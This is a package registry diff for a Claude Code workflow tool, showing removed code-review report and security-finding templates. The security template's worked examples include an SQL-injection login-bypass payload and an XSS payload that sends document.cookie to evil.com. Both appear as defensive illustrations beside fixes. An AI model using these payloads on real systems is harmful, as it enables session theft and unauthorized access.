claude-code-workflow 6.3.22 → 6.3.24
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/.claude/agents/issue-plan-agent.md +10 -5
- package/.claude/commands/issue/plan.md +1 -1
- package/.claude/skills/review-code/SKILL.md +170 -0
- package/.claude/skills/review-code/phases/actions/action-collect-context.md +139 -0
- package/.claude/skills/review-code/phases/actions/action-complete.md +115 -0
- package/.claude/skills/review-code/phases/actions/action-deep-review.md +302 -0
- package/.claude/skills/review-code/phases/actions/action-generate-report.md +263 -0
- package/.claude/skills/review-code/phases/actions/action-quick-scan.md +164 -0
- package/.claude/skills/review-code/phases/orchestrator.md +251 -0
- package/.claude/skills/review-code/phases/state-manager.md +752 -0
- package/.claude/skills/review-code/phases/state-schema.md +174 -0
- package/.claude/skills/review-code/specs/issue-classification.md +228 -0
- package/.claude/skills/review-code/specs/quality-standards.md +214 -0
- package/.claude/skills/review-code/specs/review-dimensions.md +337 -0
- package/.claude/skills/review-code/specs/rules/architecture-rules.json +63 -0
- package/.claude/skills/review-code/specs/rules/correctness-rules.json +60 -0
- package/.claude/skills/review-code/specs/rules/index.md +140 -0
- package/.claude/skills/review-code/specs/rules/performance-rules.json +59 -0
- package/.claude/skills/review-code/specs/rules/readability-rules.json +60 -0
- package/.claude/skills/review-code/specs/rules/security-rules.json +58 -0
- package/.claude/skills/review-code/specs/rules/testing-rules.json +59 -0
- package/.claude/skills/review-code/templates/issue-template.md +186 -0
- package/.claude/skills/review-code/templates/review-report.md +173 -0
- package/.claude/skills/skill-generator/SKILL.md +56 -17
- package/.claude/skills/skill-generator/templates/autonomous-orchestrator.md +10 -0
- package/.claude/skills/skill-generator/templates/sequential-phase.md +9 -0
- package/.claude/skills/skill-generator/templates/skill-md.md +84 -5
- package/.claude/workflows/cli-templates/schemas/solution-schema.json +3 -3
- package/ccw/src/templates/dashboard-js/views/issue-manager.js +8 -0
- package/package.json +1 -1
- package/.claude/skills/code-reviewer/README.md +0 -340
- package/.claude/skills/code-reviewer/SKILL.md +0 -308
- package/.claude/skills/code-reviewer/phases/01-code-discovery.md +0 -246
- package/.claude/skills/code-reviewer/phases/02-security-analysis.md +0 -442
- package/.claude/skills/code-reviewer/phases/03-best-practices-review.md +0 -36
- package/.claude/skills/code-reviewer/phases/04-report-generation.md +0 -278
- package/.claude/skills/code-reviewer/specs/best-practices-requirements.md +0 -346
- package/.claude/skills/code-reviewer/specs/quality-standards.md +0 -252
- package/.claude/skills/code-reviewer/specs/security-requirements.md +0 -243
- package/.claude/skills/code-reviewer/templates/best-practice-finding.md +0 -234
- package/.claude/skills/code-reviewer/templates/report-template.md +0 -316
- package/.claude/skills/code-reviewer/templates/security-finding.md +0 -161
|
@@ -1,316 +0,0 @@
|
|
|
1
|
-
# Report Template
|
|
2
|
-
|
|
3
|
-
## Main Report Structure (REPORT.md)
|
|
4
|
-
|
|
5
|
-
```markdown
|
|
6
|
-
# Code Review Report
|
|
7
|
-
|
|
8
|
-
**Generated**: {timestamp}
|
|
9
|
-
**Scope**: {scope}
|
|
10
|
-
**Files Reviewed**: {total_files}
|
|
11
|
-
**Total Findings**: {total_findings}
|
|
12
|
-
|
|
13
|
-
---
|
|
14
|
-
|
|
15
|
-
## 📊 Executive Summary
|
|
16
|
-
|
|
17
|
-
### Overall Assessment
|
|
18
|
-
|
|
19
|
-
{Brief 2-3 paragraph assessment of code health}
|
|
20
|
-
|
|
21
|
-
### Risk Level: {LOW|MEDIUM|HIGH|CRITICAL}
|
|
22
|
-
|
|
23
|
-
{Risk assessment based on findings severity and count}
|
|
24
|
-
|
|
25
|
-
### Key Statistics
|
|
26
|
-
|
|
27
|
-
| Metric | Value | Status |
|
|
28
|
-
|--------|-------|--------|
|
|
29
|
-
| Total Files | {count} | - |
|
|
30
|
-
| Files with Issues | {count} | {percentage}% |
|
|
31
|
-
| Critical Findings | {count} | {icon} |
|
|
32
|
-
| High Findings | {count} | {icon} |
|
|
33
|
-
| Medium Findings | {count} | {icon} |
|
|
34
|
-
| Low Findings | {count} | {icon} |
|
|
35
|
-
|
|
36
|
-
### Category Breakdown
|
|
37
|
-
|
|
38
|
-
| Category | Count | Percentage |
|
|
39
|
-
|----------|-------|------------|
|
|
40
|
-
| Security | {count} | {percentage}% |
|
|
41
|
-
| Code Quality | {count} | {percentage}% |
|
|
42
|
-
| Performance | {count} | {percentage}% |
|
|
43
|
-
| Maintainability | {count} | {percentage}% |
|
|
44
|
-
|
|
45
|
-
---
|
|
46
|
-
|
|
47
|
-
## 🎯 Quality Scores
|
|
48
|
-
|
|
49
|
-
### Security Score: {score}/100
|
|
50
|
-
{Assessment and key issues}
|
|
51
|
-
|
|
52
|
-
### Code Quality Score: {score}/100
|
|
53
|
-
{Assessment and key issues}
|
|
54
|
-
|
|
55
|
-
### Performance Score: {score}/100
|
|
56
|
-
{Assessment and key issues}
|
|
57
|
-
|
|
58
|
-
### Maintainability Score: {score}/100
|
|
59
|
-
{Assessment and key issues}
|
|
60
|
-
|
|
61
|
-
### Overall Score: {score}/100
|
|
62
|
-
|
|
63
|
-
**Grade**: {A|B|C|D|F}
|
|
64
|
-
|
|
65
|
-
---
|
|
66
|
-
|
|
67
|
-
## 🔴 Critical Findings (Requires Immediate Action)
|
|
68
|
-
|
|
69
|
-
{List all critical findings using security-finding.md template}
|
|
70
|
-
|
|
71
|
-
---
|
|
72
|
-
|
|
73
|
-
## 🟠 High Priority Findings
|
|
74
|
-
|
|
75
|
-
{List all high findings}
|
|
76
|
-
|
|
77
|
-
---
|
|
78
|
-
|
|
79
|
-
## 🟡 Medium Priority Findings
|
|
80
|
-
|
|
81
|
-
{List all medium findings}
|
|
82
|
-
|
|
83
|
-
---
|
|
84
|
-
|
|
85
|
-
## 🟢 Low Priority Findings
|
|
86
|
-
|
|
87
|
-
{List all low findings}
|
|
88
|
-
|
|
89
|
-
---
|
|
90
|
-
|
|
91
|
-
## 📋 Action Plan
|
|
92
|
-
|
|
93
|
-
### Immediate (Within 24 hours)
|
|
94
|
-
1. {Critical issue 1}
|
|
95
|
-
2. {Critical issue 2}
|
|
96
|
-
3. {Critical issue 3}
|
|
97
|
-
|
|
98
|
-
### Short-term (Within 1 week)
|
|
99
|
-
1. {High priority issue 1}
|
|
100
|
-
2. {High priority issue 2}
|
|
101
|
-
...
|
|
102
|
-
|
|
103
|
-
### Medium-term (Within 1 month)
|
|
104
|
-
1. {Medium priority issue 1}
|
|
105
|
-
2. {Medium priority issue 2}
|
|
106
|
-
...
|
|
107
|
-
|
|
108
|
-
### Long-term (Within 3 months)
|
|
109
|
-
1. {Low priority issue 1}
|
|
110
|
-
2. {Improvement initiative 1}
|
|
111
|
-
...
|
|
112
|
-
|
|
113
|
-
---
|
|
114
|
-
|
|
115
|
-
## 📊 Metrics Dashboard
|
|
116
|
-
|
|
117
|
-
### Code Health Trends
|
|
118
|
-
|
|
119
|
-
{If historical data available, show trends}
|
|
120
|
-
|
|
121
|
-
### File Hotspots
|
|
122
|
-
|
|
123
|
-
Top files with most issues:
|
|
124
|
-
1. `{file-path}` - {count} issues ({severity breakdown})
|
|
125
|
-
2. `{file-path}` - {count} issues
|
|
126
|
-
...
|
|
127
|
-
|
|
128
|
-
### Technology Breakdown
|
|
129
|
-
|
|
130
|
-
Issues by language/framework:
|
|
131
|
-
- TypeScript: {count} issues
|
|
132
|
-
- Python: {count} issues
|
|
133
|
-
...
|
|
134
|
-
|
|
135
|
-
---
|
|
136
|
-
|
|
137
|
-
## ✅ Compliance Status
|
|
138
|
-
|
|
139
|
-
### PCI DSS
|
|
140
|
-
- **Status**: {COMPLIANT|NON-COMPLIANT|PARTIAL}
|
|
141
|
-
- **Affecting Findings**: {list}
|
|
142
|
-
|
|
143
|
-
### HIPAA
|
|
144
|
-
- **Status**: {COMPLIANT|NON-COMPLIANT|PARTIAL}
|
|
145
|
-
- **Affecting Findings**: {list}
|
|
146
|
-
|
|
147
|
-
### GDPR
|
|
148
|
-
- **Status**: {COMPLIANT|NON-COMPLIANT|PARTIAL}
|
|
149
|
-
- **Affecting Findings**: {list}
|
|
150
|
-
|
|
151
|
-
---
|
|
152
|
-
|
|
153
|
-
## 📚 Appendix
|
|
154
|
-
|
|
155
|
-
### A. Review Configuration
|
|
156
|
-
|
|
157
|
-
\`\`\`json
|
|
158
|
-
{review-config}
|
|
159
|
-
\`\`\`
|
|
160
|
-
|
|
161
|
-
### B. Tools and Versions
|
|
162
|
-
|
|
163
|
-
- Code Reviewer Skill: v1.0.0
|
|
164
|
-
- Security Rules: OWASP Top 10 2021, CWE Top 25
|
|
165
|
-
- Languages Analyzed: {list}
|
|
166
|
-
|
|
167
|
-
### C. References
|
|
168
|
-
|
|
169
|
-
- [OWASP Top 10 2021](https://owasp.org/Top10/)
|
|
170
|
-
- [CWE Top 25](https://cwe.mitre.org/top25/)
|
|
171
|
-
- {additional references}
|
|
172
|
-
|
|
173
|
-
### D. Full Findings Index
|
|
174
|
-
|
|
175
|
-
{Links to detailed finding JSONs}
|
|
176
|
-
```
|
|
177
|
-
|
|
178
|
-
---
|
|
179
|
-
|
|
180
|
-
## Fix Checklist Template (FIX-CHECKLIST.md)
|
|
181
|
-
|
|
182
|
-
```markdown
|
|
183
|
-
# Code Review Fix Checklist
|
|
184
|
-
|
|
185
|
-
**Generated**: {timestamp}
|
|
186
|
-
**Total Items**: {count}
|
|
187
|
-
|
|
188
|
-
---
|
|
189
|
-
|
|
190
|
-
## 🔴 Critical Issues (Fix Immediately)
|
|
191
|
-
|
|
192
|
-
- [ ] **[SEC-001]** SQL Injection in `src/auth/user-service.ts:145`
|
|
193
|
-
- Effort: 1 hour
|
|
194
|
-
- Priority: P0
|
|
195
|
-
- Assignee: ___________
|
|
196
|
-
|
|
197
|
-
- [ ] **[SEC-002]** Hardcoded JWT Secret in `src/auth/jwt.ts:23`
|
|
198
|
-
- Effort: 30 minutes
|
|
199
|
-
- Priority: P0
|
|
200
|
-
- Assignee: ___________
|
|
201
|
-
|
|
202
|
-
---
|
|
203
|
-
|
|
204
|
-
## 🟠 High Priority Issues (Fix This Week)
|
|
205
|
-
|
|
206
|
-
- [ ] **[SEC-003]** Missing Authorization in `src/api/admin.ts:34`
|
|
207
|
-
- Effort: 2 hours
|
|
208
|
-
- Priority: P1
|
|
209
|
-
- Assignee: ___________
|
|
210
|
-
|
|
211
|
-
- [ ] **[BP-001]** N+1 Query in `src/api/orders.ts:45`
|
|
212
|
-
- Effort: 1 hour
|
|
213
|
-
- Priority: P1
|
|
214
|
-
- Assignee: ___________
|
|
215
|
-
|
|
216
|
-
---
|
|
217
|
-
|
|
218
|
-
## 🟡 Medium Priority Issues (Fix This Month)
|
|
219
|
-
|
|
220
|
-
{List medium priority items}
|
|
221
|
-
|
|
222
|
-
---
|
|
223
|
-
|
|
224
|
-
## 🟢 Low Priority Issues (Fix Next Release)
|
|
225
|
-
|
|
226
|
-
{List low priority items}
|
|
227
|
-
|
|
228
|
-
---
|
|
229
|
-
|
|
230
|
-
## Progress Tracking
|
|
231
|
-
|
|
232
|
-
**Overall Progress**: {completed}/{total} ({percentage}%)
|
|
233
|
-
|
|
234
|
-
- Critical: {completed}/{total}
|
|
235
|
-
- High: {completed}/{total}
|
|
236
|
-
- Medium: {completed}/{total}
|
|
237
|
-
- Low: {completed}/{total}
|
|
238
|
-
|
|
239
|
-
**Estimated Total Effort**: {hours} hours
|
|
240
|
-
**Estimated Completion**: {date}
|
|
241
|
-
```
|
|
242
|
-
|
|
243
|
-
---
|
|
244
|
-
|
|
245
|
-
## Summary JSON Template (summary.json)
|
|
246
|
-
|
|
247
|
-
```json
|
|
248
|
-
{
|
|
249
|
-
"report_date": "2024-01-15T12:00:00Z",
|
|
250
|
-
"scope": "src/**/*",
|
|
251
|
-
"statistics": {
|
|
252
|
-
"total_files": 247,
|
|
253
|
-
"files_with_issues": 89,
|
|
254
|
-
"total_findings": 69,
|
|
255
|
-
"by_severity": {
|
|
256
|
-
"critical": 3,
|
|
257
|
-
"high": 13,
|
|
258
|
-
"medium": 30,
|
|
259
|
-
"low": 23
|
|
260
|
-
},
|
|
261
|
-
"by_category": {
|
|
262
|
-
"security": 24,
|
|
263
|
-
"code_quality": 18,
|
|
264
|
-
"performance": 12,
|
|
265
|
-
"maintainability": 15
|
|
266
|
-
}
|
|
267
|
-
},
|
|
268
|
-
"scores": {
|
|
269
|
-
"security": 68,
|
|
270
|
-
"code_quality": 75,
|
|
271
|
-
"performance": 82,
|
|
272
|
-
"maintainability": 70,
|
|
273
|
-
"overall": 74
|
|
274
|
-
},
|
|
275
|
-
"grade": "C",
|
|
276
|
-
"risk_level": "MEDIUM",
|
|
277
|
-
"action_required": true,
|
|
278
|
-
"compliance": {
|
|
279
|
-
"pci_dss": {
|
|
280
|
-
"status": "NON_COMPLIANT",
|
|
281
|
-
"affecting_findings": ["SEC-001", "SEC-002", "SEC-008", "SEC-011"]
|
|
282
|
-
},
|
|
283
|
-
"hipaa": {
|
|
284
|
-
"status": "NON_COMPLIANT",
|
|
285
|
-
"affecting_findings": ["SEC-005", "SEC-009"]
|
|
286
|
-
},
|
|
287
|
-
"gdpr": {
|
|
288
|
-
"status": "PARTIAL",
|
|
289
|
-
"affecting_findings": ["SEC-002", "SEC-005", "SEC-007"]
|
|
290
|
-
}
|
|
291
|
-
},
|
|
292
|
-
"top_issues": [
|
|
293
|
-
{
|
|
294
|
-
"id": "SEC-001",
|
|
295
|
-
"type": "sql-injection",
|
|
296
|
-
"severity": "critical",
|
|
297
|
-
"file": "src/auth/user-service.ts",
|
|
298
|
-
"line": 145
|
|
299
|
-
}
|
|
300
|
-
],
|
|
301
|
-
"hotspots": [
|
|
302
|
-
{
|
|
303
|
-
"file": "src/auth/user-service.ts",
|
|
304
|
-
"issues": 5,
|
|
305
|
-
"severity_breakdown": { "critical": 1, "high": 2, "medium": 2 }
|
|
306
|
-
}
|
|
307
|
-
],
|
|
308
|
-
"effort_estimate": {
|
|
309
|
-
"critical": 4.5,
|
|
310
|
-
"high": 18,
|
|
311
|
-
"medium": 35,
|
|
312
|
-
"low": 12,
|
|
313
|
-
"total_hours": 69.5
|
|
314
|
-
}
|
|
315
|
-
}
|
|
316
|
-
```
|
|
@@ -1,161 +0,0 @@
|
|
|
1
|
-
# Security Finding Template
|
|
2
|
-
|
|
3
|
-
Use this template for documenting security vulnerabilities.
|
|
4
|
-
|
|
5
|
-
## Finding Structure
|
|
6
|
-
|
|
7
|
-
```json
|
|
8
|
-
{
|
|
9
|
-
"id": "SEC-{number}",
|
|
10
|
-
"type": "{vulnerability-type}",
|
|
11
|
-
"severity": "{critical|high|medium|low}",
|
|
12
|
-
"file": "{file-path}",
|
|
13
|
-
"line": {line-number},
|
|
14
|
-
"column": {column-number},
|
|
15
|
-
"code": "{vulnerable-code-snippet}",
|
|
16
|
-
"message": "{clear-description-of-issue}",
|
|
17
|
-
"cwe": "CWE-{number}",
|
|
18
|
-
"owasp": "A{number}:2021 - {category}",
|
|
19
|
-
"recommendation": {
|
|
20
|
-
"description": "{how-to-fix}",
|
|
21
|
-
"fix_example": "{corrected-code}"
|
|
22
|
-
},
|
|
23
|
-
"references": [
|
|
24
|
-
"https://...",
|
|
25
|
-
"https://..."
|
|
26
|
-
]
|
|
27
|
-
}
|
|
28
|
-
```
|
|
29
|
-
|
|
30
|
-
## Markdown Template
|
|
31
|
-
|
|
32
|
-
```markdown
|
|
33
|
-
### 🔴 [SEC-{number}] {Vulnerability Title}
|
|
34
|
-
|
|
35
|
-
**File**: `{file-path}:{line}`
|
|
36
|
-
**CWE**: CWE-{number} | **OWASP**: A{number}:2021 - {category}
|
|
37
|
-
|
|
38
|
-
**Vulnerable Code**:
|
|
39
|
-
\`\`\`{language}
|
|
40
|
-
{vulnerable-code-snippet}
|
|
41
|
-
\`\`\`
|
|
42
|
-
|
|
43
|
-
**Issue**: {Detailed explanation of the vulnerability and potential impact}
|
|
44
|
-
|
|
45
|
-
**Attack Example** (if applicable):
|
|
46
|
-
\`\`\`
|
|
47
|
-
{example-attack-payload}
|
|
48
|
-
Result: {what-happens}
|
|
49
|
-
Effect: {security-impact}
|
|
50
|
-
\`\`\`
|
|
51
|
-
|
|
52
|
-
**Recommended Fix**:
|
|
53
|
-
\`\`\`{language}
|
|
54
|
-
{corrected-code-with-comments}
|
|
55
|
-
\`\`\`
|
|
56
|
-
|
|
57
|
-
**References**:
|
|
58
|
-
- [{reference-title}]({url})
|
|
59
|
-
- [{reference-title}]({url})
|
|
60
|
-
|
|
61
|
-
---
|
|
62
|
-
```
|
|
63
|
-
|
|
64
|
-
## Severity Icon Mapping
|
|
65
|
-
|
|
66
|
-
- Critical: 🔴
|
|
67
|
-
- High: 🟠
|
|
68
|
-
- Medium: 🟡
|
|
69
|
-
- Low: 🟢
|
|
70
|
-
|
|
71
|
-
## Example: SQL Injection Finding
|
|
72
|
-
|
|
73
|
-
```markdown
|
|
74
|
-
### 🔴 [SEC-001] SQL Injection in User Authentication
|
|
75
|
-
|
|
76
|
-
**File**: `src/auth/user-service.ts:145`
|
|
77
|
-
**CWE**: CWE-89 | **OWASP**: A03:2021 - Injection
|
|
78
|
-
|
|
79
|
-
**Vulnerable Code**:
|
|
80
|
-
\`\`\`typescript
|
|
81
|
-
const query = \`SELECT * FROM users WHERE username = '\${username}'\`;
|
|
82
|
-
const user = await db.execute(query);
|
|
83
|
-
\`\`\`
|
|
84
|
-
|
|
85
|
-
**Issue**: User input (`username`) is directly concatenated into SQL query, allowing attackers to inject malicious SQL commands and bypass authentication.
|
|
86
|
-
|
|
87
|
-
**Attack Example**:
|
|
88
|
-
\`\`\`
|
|
89
|
-
username: ' OR '1'='1' --
|
|
90
|
-
Result: SELECT * FROM users WHERE username = '' OR '1'='1' --'
|
|
91
|
-
Effect: Bypasses authentication, returns all users
|
|
92
|
-
\`\`\`
|
|
93
|
-
|
|
94
|
-
**Recommended Fix**:
|
|
95
|
-
\`\`\`typescript
|
|
96
|
-
// Use parameterized queries
|
|
97
|
-
const query = 'SELECT * FROM users WHERE username = ?';
|
|
98
|
-
const user = await db.execute(query, [username]);
|
|
99
|
-
|
|
100
|
-
// Or use ORM
|
|
101
|
-
const user = await User.findOne({ where: { username } });
|
|
102
|
-
\`\`\`
|
|
103
|
-
|
|
104
|
-
**References**:
|
|
105
|
-
- [OWASP SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
|
|
106
|
-
- [CWE-89](https://cwe.mitre.org/data/definitions/89.html)
|
|
107
|
-
|
|
108
|
-
---
|
|
109
|
-
```
|
|
110
|
-
|
|
111
|
-
## Example: XSS Finding
|
|
112
|
-
|
|
113
|
-
```markdown
|
|
114
|
-
### 🟠 [SEC-002] Cross-Site Scripting (XSS) in Comment Rendering
|
|
115
|
-
|
|
116
|
-
**File**: `src/components/CommentList.tsx:89`
|
|
117
|
-
**CWE**: CWE-79 | **OWASP**: A03:2021 - Injection
|
|
118
|
-
|
|
119
|
-
**Vulnerable Code**:
|
|
120
|
-
\`\`\`tsx
|
|
121
|
-
<div dangerouslySetInnerHTML={{ __html: comment.body }} />
|
|
122
|
-
\`\`\`
|
|
123
|
-
|
|
124
|
-
**Issue**: User-generated content rendered without sanitization, allowing script injection.
|
|
125
|
-
|
|
126
|
-
**Attack Example**:
|
|
127
|
-
\`\`\`
|
|
128
|
-
comment.body: "<script>fetch('evil.com/steal?cookie='+document.cookie)</script>"
|
|
129
|
-
Effect: Steals user session cookies
|
|
130
|
-
\`\`\`
|
|
131
|
-
|
|
132
|
-
**Recommended Fix**:
|
|
133
|
-
\`\`\`tsx
|
|
134
|
-
import DOMPurify from 'dompurify';
|
|
135
|
-
|
|
136
|
-
// Sanitize HTML before rendering
|
|
137
|
-
<div dangerouslySetInnerHTML={{
|
|
138
|
-
__html: DOMPurify.sanitize(comment.body)
|
|
139
|
-
}} />
|
|
140
|
-
|
|
141
|
-
// Or use text content (if HTML not needed)
|
|
142
|
-
<div>{comment.body}</div>
|
|
143
|
-
\`\`\`
|
|
144
|
-
|
|
145
|
-
**References**:
|
|
146
|
-
- [OWASP XSS Prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)
|
|
147
|
-
- [CWE-79](https://cwe.mitre.org/data/definitions/79.html)
|
|
148
|
-
|
|
149
|
-
---
|
|
150
|
-
```
|
|
151
|
-
|
|
152
|
-
## Compliance Mapping Template
|
|
153
|
-
|
|
154
|
-
When finding affects compliance:
|
|
155
|
-
|
|
156
|
-
```markdown
|
|
157
|
-
**Compliance Impact**:
|
|
158
|
-
- **PCI DSS**: Requirement 6.5.1 (Injection flaws)
|
|
159
|
-
- **HIPAA**: Technical Safeguards - Access Control
|
|
160
|
-
- **GDPR**: Article 32 (Security of processing)
|
|
161
|
-
```
|